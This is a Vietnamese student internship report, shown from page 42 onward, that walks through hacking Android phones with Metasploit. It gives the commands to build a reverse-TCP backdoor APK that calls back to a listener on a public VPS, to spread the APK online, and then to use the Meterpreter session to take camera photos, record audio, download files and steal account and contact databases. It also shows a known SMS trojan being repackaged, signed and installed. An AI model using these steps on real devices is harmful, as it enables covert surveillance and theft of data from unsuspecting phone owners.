đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề quan
trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc này ta
nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến máy
victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta dùng
reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn công
mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa vào đó
mà ta chọn cách thích hợp.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 42
Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn
payload cần dùng.
Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là:
set PAYLOAD windows/meterpreter/reverse_ord_tcp
Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp
Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options",
"info name_payload" ,"show advanced",…
Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả.
3.4.Tấn công android dùng Metasploit Framework trong Kali Linux
Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R >
/root/Desktop/app.apk
Hình 30.
Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng lệnh:
ifconfig
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 43
Hình 31.
Và đây là file app.apk mà chúng ta vừa tạo
Hình 32.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 44
Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:
msfconsole
Hình 33.
Chúng ta cài đặt các thông số cần thiết
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.159.128
set lport 8080
Với lhost và lport giống với khi chúng ta tạo file app.apk
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 45
Hình 34.
Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp
vào nút Reverse_tcp:
Hình 35.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 46
Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:
Hình 36.
Để xem thông tin về máy, nhập lệnh sysinfo
- Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Hình 37.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 47
Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera
ở phần trước. Ví dụ như sau:
Hình 38.
- Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Hình 39.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 48
- Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Hình 40.
Ta tải file app.apk trong thư mục Download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
Hình 41.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 49
Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh
download app.apk
Hình 42.
Và file này sẽ được tải về thư mục root của máy Kali
4. Thực hiện xâm nhập android thông qua mạng Internet
4.1.Giới thiệu về VPS
4.1.1. VPS là gì?
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài
khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS
có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị
hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server,
nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng
server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS
đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy
trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có
thêm một số kiến thức về bảo mật, cấu hình server,….
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 50
4.1.2. Đặc điểm về thông số VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM
riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có
thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,
dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không
cần phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
4.1.3. Giá trị khi sử dụng VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 51
4.2.Cài đặt metasploit
Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit
về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới
Ở đây mình sẽ down bản METASPLOIT COMMUNITY.
Hình 43.
Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào
SUBMIT & DOWNLOAD để nhận một license
Hình 44.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 52
Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp.
Hình 45.
Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next
Hình 46. Hình 47.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 53
Bên dưới ta chọn thư mục để cài đặt và nhấn Next
Hình 48.
Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài
đặt
Hình 49.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 54
SLL Port, Server Name và Days of validity ta để mặc định
Hình 50. Hình 51.
Ta tiếp tục nhấn Next để bắt đầu cài đặt
Hình 52. Hình 53.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 55
Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt
Hình 54.
Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp đầy
đủ theo những yêu cầu bên dưới và nhấn Create Account
Hình 55.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 56
Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình
Hình 56.
Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn
ACTIVE LICENSE
Hình 57.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 57
Như vậy là ta đã có một tài khoản metasploit
Hình 58.
4.3.Xâm nhập vào thiết bị android
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta.
/root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
Hình 59.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 58
Sau khi tạo một backdoor được tạo, ta tải nó lên mạng.
Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
Hình 60.
Ta vào máy VPS và mở Metasploit Console lên
Hình 61.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 59
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta
sẽ tấn công:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor
Hình 62.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 60
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
Hình 63.
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
Hình 64.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 61
- Xem thông tin
Ta dùng lệnh sysinfo để xem thông tin máy android
Hình 65.
- Xem camera
Ta dùng lênh webcam_list để xem danh sách các camera
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
Hình 66.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 62
Để di chuyển đến thư mục nào ta dùng lệnh
cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Hình 67.
Ta vào thư mục /sdcard/Download để down file về
- Download file
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
Hình 68.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 63
Muốn xóa một file ta dùng lệnh rm <tên file>
Hình 69.
- Đánh cắp tài khoản, danh bạ
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Ta dùng lệnh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Hình 70.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 64
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
Hình 71.
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Hình 72.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 65
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Hình 73.
Tiếp tục ta vào địa chỉ
cd /data/data/com.android.providers.contacts/databases
Để copy file contacts2.db về Sdcard bằng lệnh
cp contacts2.db /sdcard
Hình 74.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 66
Sau đó ta download file contacts2.db về máy VPS
Hình 75.
Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của
chúng ta
Hình 76.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 67
5. Cài đặt SMS Trojan dùng iCalender
5.1.Cài đặt máy ảo android AVD Manager
5.1.1. Cài đặt JDK:
JDK (Java Development Kit) là bộ công cụ phát triển Java. Nó bao gồm nhiều chương trình tiện
ích như trình biên dịch javac (java compiler), chương trình gỡ lỗi, appletviewer, trình phát sinh tài
liệu javadoc, đóng gói dữ liệu jar v.v... Nếu ai muốn lập trình ứng dụng bằng ngôn ngữ java thì bắt
buộc phải cài JDK.
- Bước 1: Trước tiên để cài đặt JDK, chúng ta vào link bên dưới và tải jdk về
Link:
http://www.oracle.com/technetwork/java/javase/downloads/index.html?ssSourceSiteId=otnjp
Hình 77. Hình 78.
Chú ý: Nếu chúng ta dùng hệ điều hành nào thì ta tải phiên bản dùng cho hệ điều hành đó. Ở đây
em tải bản dùng cho windows x64.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 68
- Bước 2: Cài đặt jdk
Ta nhấp chuột vào file cài đặt đã tải về và cài như các chương trình bình thường.
Hình 79.
5.1.2. Cài đặt android SDK
Android SDK thực chất là tập hợp các công cụ và thư viện để phát triển các ứng dụng trên nền
tảng hệ điều hành Android.
- Bước 1: Trước tiên ta phải tải android SDK về máy theo link bên dưới.
Link:
http://developer.android.com/sdk/index.html
Hình 80. Hình 81.
Chú ý: ta nên tải bản phù hợp với hệ điều hành của mình. Ở đây em tải bản cho windows x
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 69
- Bước 2: Tải các packages trong android SDK manager
Ta giải nén file đã down về, trong đó gồm có: một thư mục eclipse, một thư mục SDK và một
file SDK Manager.
Vào thư mục eclipse và mở file eclipse.exe lên. Trong eclipse, ta vào Window -> Android SDK
Manager để mở bảng Android SDK Manager.
Hình 82.
Ta muốn sử dụng gói công cụ nào thì đánh dấu vào gói công cụ đó rồi nhấn Install.
5.1.3. Cài đặt máy ảo android
Sau khi đã tải và cài đặt các gói cần thiết cho việc cài đặt máy ảo, ta vào Window -> Android
Virtual Device Manager để mở cửa sổ AVD Manager như bên dưới
Hình 83.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 70
Ta nhấp vào Create để bắt đầu tạo một máy ảo mới
Hình 84.
AVD name: tên của máy ảo sẽ được tạo
Device: chọn thiết bị muốn tạo máy ảo
Target: chọn phiên bản android cho máy ảo
Skin: chọn kích cỡ của màn hình
Internal Storage: chọn dung lượng bộ nhớ trong
SD card: dung lượng thẻ SD
Sau khi chọn xong ta nhấn OK. Để mở máy ảo lên ta nhấp vào máy ảo vừa tạo và nhấn Start.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 71
Đây là máy ảo thu được:
Hình 85.
5.2.Cài SMS Trojan vào máy android ảo
5.2.1. Các công cụ cần thiết
- apktool: giải mã các file .apk và .rar, đóng gói apk phục vụ cho việc tùy chỉnh sửa đổi các file
đó. https://code.google.com/p/android-apktool/
- dex2jar: dịch file .apk thành file .jar. https://code.google.com/p/dex2jar/
- id-gui: đọc code java từ file .jar. https://code.google.com/p/innlab/downloads/detail?name=jd-
gui-0.3.3.windows.zip&can=2&q=2
- File iCalendar.apk, một trong 11 ứng dụng bị gỡ bỏ khỏi Android Market do có chứa malware.
- Hai máy ảo android dùng công cụ AVD Manager
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 72
5.2.2. Các bước thực hiện
- Bước 1: Dùng phần mềm WinZip giải nén file classes.dex trong iCalendar.apk vào folder
chứa công cụ dex2jar.
Hình 86.
- Bước 2: Vào command windows, vào trong thư mục dex2jar để thực hiện câu lệnh sau:
dex2jar classes.dex
Câu lệnh này chuyển đổi file classes.dex thành file classes_dex2jar.jar.
Hình 87.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 73
- Bước 3: Dùng công cụ id-gui để mở file classes_dex2jar.jar có được ở bước 2 để xem
source code của ứng dụng iCalendar.
Hình 88.
- Bước 4: Vào command windows, vào trong thư mục chứa apktool (phải chứa sẵn
iCalendar.apk) và nhập 2 lệnh sau:
apktool if iCalendar.apk
apktool d iCalendar.apk
Ta được kết quả:
Hình 89.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 74
Truy cập vào thư mục iCalendar và di chuyển đến thư mục smalicommjiCalendar
Hình 90.
- Bước 5: Mở file iCalendar.smali và file SmsReceiver.smali bằng Notepad và thực hiện
như hình bên dưới sau đó lưu lại.
Hình 91.
Hình 92.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 75
- Bước 6: Vào command windows thực hiện câu lệnh sau để đóng gói ứng dụng iCalendar
đã được chỉnh sửa thành file .apk mới tại thư mục iCalendardist
Hình 93.
- Bước 7: Đưa file iCalendar.apk đã tạo ở bước 6 vào thư mục bin nằm trong thư mục Java
Hình 94.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 76
Trên command windows vào thư mục trên và nhập các lệnh sau để verify (Signing ứng
dụng, tạo chữ ký điện tử để thiết bị) gói apk để có thể sử dụng trên thiết bị (phải chọn run
as administrator khi chạy cmd):
keytool -genkey -v -keystore iCalendar-iCalendar.keystore -alias iCalendar -keyalg
RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore iCalendar-
iCalendar.keystore iCalendar.apk iCalendar
jarsigner -verify -verbose -certs iCalendar.apk
Kết quả:
Hình 95.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 77
- Bước 8: Copy file iCalendar.apk vào thư mục platform-tools của Android
SDK và dùng lệnh sau để cài ứng dụng vào giả lập
adb -s emulator-5554 install iCalendar.apk
Hình 96.
Hình 97.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 78
Vậy ta đã cài đặt thành công lên máy ảo.
- Bước 9: Kích hoạt Trojan gửi tin nhắn đến máy ảo 5556 (mở ứng dụng
iCalendar rồi click 7 lần).
Kết quả:
Hình 98.
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kì

More Related Content

What's hot

Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi kyNhoxPO
 
Báo cáo TTTN lập trình S7300 và hệ thống SCADA
Báo cáo TTTN lập trình S7300 và hệ thống SCADABáo cáo TTTN lập trình S7300 và hệ thống SCADA
Báo cáo TTTN lập trình S7300 và hệ thống SCADAFPT Telecom
 
Báo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng JoomlaBáo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng JoomlaThảo Trần
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Seavar Neuvell
 
Báo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaBáo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaKhôi Nguyễn
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
BaocaothuctapcuoikyVăn Tiến
 
Báo cáo thực tập cuối kỳ - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ   - Phạm Tiến QuânBáo cáo thực tập cuối kỳ   - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ - Phạm Tiến QuânQuân Quạt Mo
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳphạm ngọc phú
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kìDlinh Truong
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gkice_eyes
 

What's hot (18)

Đề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAY
Đề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAYĐề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAY
Đề tài: Xây dựng, triển khai và quản lý mô hình mạng, HAY
 
Phan cường
Phan cườngPhan cường
Phan cường
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Báo cáo TTTN lập trình S7300 và hệ thống SCADA
Báo cáo TTTN lập trình S7300 và hệ thống SCADABáo cáo TTTN lập trình S7300 và hệ thống SCADA
Báo cáo TTTN lập trình S7300 và hệ thống SCADA
 
Báo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng JoomlaBáo cáo thực tập làm website bằng Joomla
Báo cáo thực tập làm website bằng Joomla
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014
 
Athena.report
Athena.reportAthena.report
Athena.report
 
Thuc tapathena
Thuc tapathenaThuc tapathena
Thuc tapathena
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Báo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaBáo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam Athena
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
Baocaothuctapcuoiky
 
Báo cáo thực tập cuối kỳ - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ   - Phạm Tiến QuânBáo cáo thực tập cuối kỳ   - Phạm Tiến Quân
Báo cáo thực tập cuối kỳ - Phạm Tiến Quân
 
Phan cường
Phan cườngPhan cường
Phan cường
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gk
 
Android
AndroidAndroid
Android
 

Similar to Báo cáo thực tập cuối kì

Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậptuankiet123
 
BÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANHBÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANHtranvananh2407
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kìHai Te
 
đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhLoc Tran
 
Báo cáo thực tập cuoi ki joomla athena
Báo cáo thực tập cuoi ki joomla athenaBáo cáo thực tập cuoi ki joomla athena
Báo cáo thực tập cuoi ki joomla athenaTuan Huy
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gkice_eyes
 
Bao cao giua ky
Bao cao giua kyBao cao giua ky
Bao cao giua kyice_eyes
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaBoy Nguyễn
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gkice_eyes
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapThu Hien
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hườngHường Tô
 
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008Khanh Dinh
 
Baocao pham nguyendanghoang
Baocao pham nguyendanghoangBaocao pham nguyendanghoang
Baocao pham nguyendanghoangHoàng Phạm
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ckice_eyes
 
Báo cáo thực tập cuối kỳ Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ   Nguyễn Minh ChươngBáo cáo thực tập cuối kỳ   Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ Nguyễn Minh Chươngmasternokizep
 
Báo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh Chương
Báo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh ChươngBáo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh Chương
Báo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh Chươngmasternokizep
 
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...Phan Hữu Linh
 

Similar to Báo cáo thực tập cuối kì (20)

Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
BÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANHBÁO CÁO THỰC TẬP - TRẦN VĂN ANH
BÁO CÁO THỰC TẬP - TRẦN VĂN ANH
 
Thực tập
Thực tậpThực tập
Thực tập
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
 
đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minh
 
Báo cáo thực tập cuoi ki joomla athena
Báo cáo thực tập cuoi ki joomla athenaBáo cáo thực tập cuoi ki joomla athena
Báo cáo thực tập cuoi ki joomla athena
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gk
 
Bao cao giua ky
Bao cao giua kyBao cao giua ky
Bao cao giua ky
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gk
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctap
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
 
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
 
Baocao pham nguyendanghoang
Baocao pham nguyendanghoangBaocao pham nguyendanghoang
Baocao pham nguyendanghoang
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
 
Báo cáo thực tập cuối kỳ Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ   Nguyễn Minh ChươngBáo cáo thực tập cuối kỳ   Nguyễn Minh Chương
Báo cáo thực tập cuối kỳ Nguyễn Minh Chương
 
Báo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh Chương
Báo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh ChươngBáo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh Chương
Báo Cáo Thực Tập Cuối Kỳ Athena - Nguyễn Minh Chương
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
